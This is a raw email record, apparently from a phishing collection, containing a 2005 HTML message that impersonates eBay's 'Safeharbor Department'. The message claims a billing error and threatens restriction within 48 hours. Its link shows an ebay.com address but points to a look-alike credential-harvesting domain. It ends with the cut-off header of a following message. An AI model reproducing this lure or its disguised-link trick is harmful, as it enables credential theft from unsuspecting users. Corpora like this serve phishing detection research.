From: aw-confirm@ebay.com <aw-confirm@ebay.com>
To: jose@monkey.org
Reply-To: aw-confirm@ebay.com
Subject: TKO Notice: ***Urgent Safeharbor Department Notice*** 
Date: Mon, 01 Aug 2005 03:04:20 +0300
MIME-Version: 1.0
Content-Type: multipart/related; boundary="ee5975df-afde-42c9-af60-5364f0332f72"
Message-Id: <20050801000419.87C31183835@mail2.monkey.org>
Content-Length: 4665
Lines: 95
Status: O
X-Status: 
X-Keywords:                  
X-UID: 154


This is a multi-part message in MIME format
--ee5975df-afde-42c9-af60-5364f0332f72
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

<DIV>
<DIV>
<TABLE cellSpacing=3D0 cellPadding=3D0 bgColor=3D#ffffff border=3D0>
<TBODY>
<TR>
<TD><A href=3D"http://pages.ebay.com/" target=3D_blank><IMG alt=3D"From =
collectibles to cars, buy and sell all kinds of items on eBay" src=3D=
"http://pics.ebaystatic.com/aw/pics/register/HeaderRegister_387x40.gif" =
border=3D0></A></TD></TR></TBODY></TABLE><!--Header code ends-->
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D600 border=3D0>
<TBODY>
<TR>
<TD colSpan=3D2><IMG height=3D10 alt=3D" " src=3D=
"http://pics.ebaystatic.com/aw/pics/spacer.gif" width=3D1></TD></TR>
<TR>
<TD bgColor=3D#9999cc colSpan=3D2><IMG height=3D2 alt=3D" " src=3D=
"http://pics.ebaystatic.com/aw/pics/spacer.gif" width=3D1></TD></TR>
<TR bgColor=3D#d6dcfe>
<TD width=3D25><IMG height=3D3 alt=3D"" src=3D=
"http://pics.ebaystatic.com/aw/pics/sitewide/leftLine_16x3.gif" width=3D16 =
align=3Dmiddle></TD>
<TD vAlign=3Dcenter width=3D575>
<TABLE cellSpacing=3D0 cellPadding=3D1 width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD vAlign=3Dcenter noWrap><FONT face=3D"Verdana, Helvetica, Arial, =
sans-serif" size=3D3><B>eBay Suspension</B></FONT> </TD>
<TD vAlign=3Dcenter noWrap align=3Dright><A href=3D=
"http://pages.ebay.com/help/new/signin.html" target=3D_blank onfiltered=3D=
"return openHelpWindow(this.href);"><IMG height=3D14 src=3D=
"http://pics.ebaystatic.com/aw/pics/listings/questionMark_14x14.gif" width=3D=
14 border=3D0></A><IMG height=3D1 alt=3D" " src=3D=
"http://pics.ebaystatic.com/aw/pics/spacer.gif" width=3D4><FONT face=3D=
"Arial, Helvetica, sans-serif" color=3D#003399 size=3D2><A href=3D=
"http://pages.ebay.com/help/new/signin.html" target=3D_blank onfiltered=3D=
"return openHelpWindow(this.href);">Need Help?</A></FONT><FONT color=3D=
#003399><IMG height=3D1 alt=3D" " src=3D=
"http://pics.ebaystatic.com/aw/pics/spacer.gif" width=3D=
2></FONT></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#9999cc colSpan=3D3><FONT color=3D#003399><IMG height=3D2 alt=3D=
" " src=3D"http://pics.ebaystatic.com/aw/pics/spacer.gif" width=3D=
1></FONT></TD></TR>
<TR bgColor=3D#ffffcc>
<TD width=3D"100%" colSpan=3D3>
<TABLE cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD align=3Dleft><FONT color=3D#003399><IMG height=3D1 src=3D=
"http://pics.ebaystatic.com/aw/pics/spacer.gif" width=3D8></FONT></TD>
<TD align=3Dleft width=3D"100%"><FONT face=3D"Arial, Helvetica, sans-serif" =
color=3D#003399 size=3D2></FONT></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#9999cc colSpan=3D2><FONT color=3D#003399><IMG height=3D2 alt=3D=
" " src=3D"http://pics.ebaystatic.com/aw/pics/spacer.gif" width=3D=
1></FONT></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D600 border=3D0>
<TBODY>
<TR bgColor=3D#ffffff>
<TD width=3D15 height=3D23><FONT color=3D#003399></FONT></TD>
<TD vAlign=3Dbottom align=3Dmiddle colSpan=3D3 height=3D23><FONT color=3D=
#003399></FONT>
<TD width=3D60 height=3D23 HSPACE=3D"0" VSPACE=3D"0" BORDER=3D"0"><FONT =
color=3D#003399></FONT></TD><FONT face=3D"Arial, Verdana, Helvetica" size=3D=
2><BR>Dear valued eBay member, <BR><BR>During our regularly scheduled account =
maintenance and verification procedures, we have detected a slight error in =
your billing information. <BR><BR>This might be due to either of the =
following reasons: <BR><BR>1. A recent change in your personal information ( =
i.e.change of address). <BR>2. Submiting invalid information during the =
initial sign up process. <BR>3. An inability to accurately verify your =
selected option of payment due to an internal error within our processors. =
<BR><BR>Once you have updated your account records your eBay session will not =
be interrupted and will <BR>continue as normal. <BR><BR>To update your eBay =
records click on the following link: <BR><A href=3D=
"http://sing-in-sec.com/CGI-BIN/ws/SignIn/error.html" target=3D_blank =
onfiltered=3D"return ShowLinkWarning()"><FONT
 color=3D#003399>http://cgi1.ebay.com/aw-cgi/ebayISAPI.dll?UPdate</FONT></A> =
<BR><BR>If your account information is not updated within 48 hours then your =
ability to use eBay will become restricted. <BR><BR><BR>Regards, =
<BR><BR>Safeharbor Department <BR>eBay, Inc. </TR>
<TR></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D599 bgColor=3D#9999cc border=3D=
0>
<TBODY>
<TR>
<TD height=3D2><IMG height=3D2 src=3D=
"http://pics.ebaystatic.com/aw/pics/spacer.gif" width=3D=
2></TD></TR></TBODY></TABLE></FONT></DIV></DIV><p>  
--ee5975df-afde-42c9-af60-5364f0332f72--

From curtreynoldsjx@ebay.com  Mon Aug  1 23:16:31 2005
Return-Path: <curtreynoldsjx@ebay.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 2673D536E39
	for <jose@login.monkey.org>; Mon,  1 Aug 2005 23:16:31 -0400 (EDT)
Received: from 64.4.240.74 (unknown [194.38.138.83])
	by mail2.monkey.org (Postfix) with ESMTP id B72881836B6
	for <jose@monkey.org>; Mon,  1 Aug 2005 23:16:29 -0400 (EDT)
Message-ID: <42EFD440.EABD8DB8@ebay.com>
